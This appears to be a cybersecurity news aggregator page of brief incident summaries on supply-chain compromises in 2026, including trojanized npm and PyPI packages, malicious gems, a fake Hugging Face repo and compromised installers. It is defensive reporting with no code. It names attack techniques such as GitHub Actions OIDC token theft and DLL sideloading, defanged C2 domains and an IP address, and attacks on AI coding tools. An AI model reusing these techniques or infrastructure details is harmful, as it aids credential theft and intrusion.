All news with #supply chain compromise tag

🔥 Palo Alto released fixes for CVE-2026-0300, a critical PAN-OS buffer-overflow exploited in the wild to drop payloads like EarthWorm and ReverseSocks5. The bulletin also highlights new and recurring threats including zero-auth API data leaks at an AI training vendor, an FCC extension for router updates, supply-chain contests, and sophisticated phishing campaigns. Several incidents employ weaponized attachments, tokenizer tampering in AI models, and open-source tools to achieve stealthy remote access and long-term persistence.

🔒 Foxconn confirmed a cyberattack affected some of its North American factories and says impacted sites are resuming normal production. The company said its cybersecurity team activated response measures to maintain continuity of operations and deliveries. Nitrogen ransomware operators claimed 8 TB of data and over 11 million documents were stolen, allegedly including files from Apple, Nvidia, Intel and Google. Foxconn has faced prior ransomware incidents.

🔍 Security researchers have identified a campaign called GemStuffer that abuses RubyGems as a storage channel for scraped content rather than as a vehicle for mass malware distribution. More than 150 gems were observed packaging HTTP responses from U.K. local government ModernGov portals into valid .gem archives and publishing them using hardcoded API keys. Variants either build and push gems via the CLI (creating temporary credentials under /tmp and overriding HOME) or upload archives directly to the registry API, after which attackers can retrieve the content with a simple gem fetch.

🛡️ The TeamPCP group compromised 170 npm and PyPI packages on May 11, rapidly spreading malicious code across ecosystems including the @tanstack router and Mistral AI SDKs. Attackers abused GitHub Actions' pull_request_target trigger to harvest OIDC tokens and inject the Mini Shai-Hulud malware, which steals credentials and carries a destructive dead-man’s switch. Security vendors detected the compromise quickly; affected users should check lockfiles, pin known-good versions, and rotate exposed credentials.

🔍 AI coding agents now operate across IDEs, terminals, and extension runtimes, so defenders must expand focus beyond source code to repository files, instruction and runtime settings, and third‑party extensions that shape agent behavior. VirusTotal Code Insight and agentic threat intelligence apply semantic analysis to detect malicious intent in syntactically valid artifacts and link findings to broader campaigns and supply‑chain risks. Examples—weaponized tasks.json, malicious Skill.md, redirected settings.json endpoints, and sabotaged extensions—illustrate how semantics can enable exfiltration, privilege escalation, and stealthy attacker control.

🔒 RubyGems has temporarily disabled new account registrations after a coordinated malicious campaign targeted the registry, forcing maintainers to pause signups while they investigate. Mend.io and RubyGems report hundreds of affected packages; some contained exploits and junk spam. The maintainers are removing malicious gems, blocking bot accounts, and coordinating with Fastly to enable a WAF and tighter rate limits before reopening signups.

⚠️ Socket reports a wave of the Mini Shai‑Hulud campaign modified 84 npm artifacts in the @tanstack namespace on 11 May 2026, inserting a heavily obfuscated credential‑stealing payload. Attackers abused GitHub Actions via the pull_request_target pattern, cache poisoning and runtime OIDC token extraction to hijack release pipelines. Affected packages included high‑download modules like @tanstack/react-router, and the GitHub Advisory Database rated the incident critical.

⚠ TeamPCP's "Mini Shai-Hulud" campaign has trojanized npm and PyPI packages from maintainers including TanStack, Mistral AI, OpenSearch, UiPath, and Guardrails AI, deploying an obfuscated credential stealer that targets cloud services, crypto wallets, AI tools, messaging apps and CI systems. The malware exfiltrates data via a Session Protocol domain (filev2.getsession[.]org), a typosquat domain and GitHub API dead-drops, and persists through IDE hooks in Claude Code and VS Code. Attackers abused GitHub Actions OIDC permissions and produced malicious packages with valid SLSA attestations; TanStack's cluster was assigned CVE-2026-45321 (CVSS 9.6).

🔒 A recently disclosed cPanel vulnerability, tracked as CVE-2026-41940, is being exploited at scale to deploy backdoors, plant SSH keys, steal credentials, and compromise hosting systems. Researchers at XLab link much of the activity to a long-running group called Mr_Rot13, with automated scans from over 2,000 attacker IPs observed after the late-April disclosure. The incident highlights weak visibility into hosting control planes and urges organizations to treat exposed control panels as high-priority incidents: patch immediately, rotate credentials, hunt for webshells, and review logs for persistence.

🔐 Three separate April reports describe unrelated threat actors independently targeting developer machines as the preferred initial-access vector. The incidents include a North Korean campaign that trojanized packages across five ecosystems, a Zig-compiled native binary that infects IDEs, and a cascading compromise chaining developer tools into credential theft. Together they illustrate how developer workstations function as credential stores, pipeline controllers and trust anchors, and why traditional endpoint controls are insufficient. Organizations must improve visibility, isolate build environments, enforce stricter controls on IDE extensions and package installs, and assign clear ownership for this distinct attack surface.

🔒 HiddenLayer discovered the Open-OSS/privacy-filter repository on Hugging Face was malicious on May 7. The repo, which copied OpenAI's Privacy Filter model card almost verbatim and showed inflated engagement, delivered a Rust-based infostealer via a base64-encoded loader. The malware steals browser passwords, session cookies, tokens, crypto wallet data and other credentials. HiddenLayer warns anyone who ran files from the repo to treat hosts as fully compromised and to wipe, isolate and rotate all affected credentials.

🔒 Checkmarx warned that a rogue version of its Jenkins AST plugin was published to the Jenkins Marketplace and contained credential-stealing malware attributed to the TeamPCP threat group. The attackers used credentials obtained in a prior Trivy supply-chain breach to backdoor multiple developer tools and maintain access. Checkmarx is publishing a clean plugin release, advising users to revert to version 2.0.13-829.vc72453fa_1c16, rotate secrets, and investigate for compromise.

🔒 Checkmarx confirmed a modified Jenkins AST plugin was published to the Jenkins Marketplace after attackers used stolen credentials to push malicious code. The company released v2.0.13-848.v76e89de8a_053 on GitHub and the Marketplace and says this release addresses the incident. It advised users to ensure they run 2.0.13-829.vc72453fa_1c16 (published Dec 17, 2025) or later. Researchers attribute the activity to TeamPCP.

⚡ This weekly recap highlights a string of active campaigns and exploited flaws affecting enterprise and cloud environments. Attackers weaponized vulnerabilities in Ivanti EPMM and Palo Alto PAN-OS, while a new modular Linux implant dubbed Quasar Linux (QLNX) pairs a kernel rootkit with a P2P mesh to resist takedowns. Several supply-chain compromises and credential-stealing campaigns are targeting cloud and developer tooling, and threat actors increasingly abuse legitimate RMM platforms for persistence.

⚠️ A malicious Hugging Face repository posing as an OpenAI release delivered an infostealer to Windows hosts and accumulated about 244,000 downloads before removal. Researchers at HiddenLayer found the repo copied OpenAI’s model card and included a loader.py that fetched and executed credential-stealing payloads. The loader disabled SSL verification, used jsonkeeper.com as a C2, and employed scheduled tasks and a Rust-based infostealer to exfiltrate browser data, wallets, Discord storage, and FileZilla credentials.

⚠ The official JDownloader website was compromised between May 6 and May 7, 2026, and attackers replaced alternative Windows and Linux installers with malicious payloads. The Windows binaries deploy a heavily obfuscated Python-based remote access trojan, while the Linux shell installer installs SUID-root components and persistence. Developers say the CMS was abused to alter download links without host-level access and have taken the site offline to investigate. Users who ran affected installers should treat systems as compromised, verify installers' digital signatures (AppWork GmbH) and consider reinstalling and rotating credentials.

🔒 RansomHouse has claimed responsibility for last week's intrusion into Trellix's source code repository, publishing a small set of images as proof of access to the vendor's appliance management system. Trellix confirmed unauthorized access on May 1 and said it immediately engaged leading forensic experts and notified law enforcement. The company reported no evidence so far that its source code release or distribution process was affected and continues to investigate.

⚠️ A fake Claude website pushed a 505MB archive named 'Claude-Pro-windows-x64.zip' that installs a trojanized MSI and drops three Startup files: NOVupdate.exe, NOVupdate.exe.dat, and avk.dll. Sophos and Malwarebytes analysis shows the signed G Data updater is abused to sideload avk.dll and an encrypted payload, which decrypts an in-memory DonutLoader that deploys the new Beagle backdoor. Beagle runs in memory, communicates with C2 at license.claude-pro[.]com (8.217.190[.]58) over TCP/443 or UDP/8080 using a hardcoded AES key, and supports basic file and command operations.

🛡️ Disc Soft has confirmed that certain Daemon Tools Lite installers were Trojanized and released in a compromised build (version 12.5.1) after unauthorized interference in its build environment. The company released a malware-free update, Version 12.6, within 12 hours of notification and says the incident is contained. Users who installed the impacted release are advised to uninstall the application, run a full system scan with trusted security software, and reinstall only the verified package from the official site.

🔒 Disc Soft confirmed a supply-chain compromise that trojanized installers for DAEMON Tools Lite and has released a clean build. The company says it secured its infrastructure and published version 12.6 (May 5) which no longer exhibits malicious behavior. Users who installed the free 12.5.1 build since April 8 should uninstall, run a full antivirus scan, and reinstall the latest release. Kaspersky found backdoors and a two-stage payload deployed to thousands of systems across 100+ countries.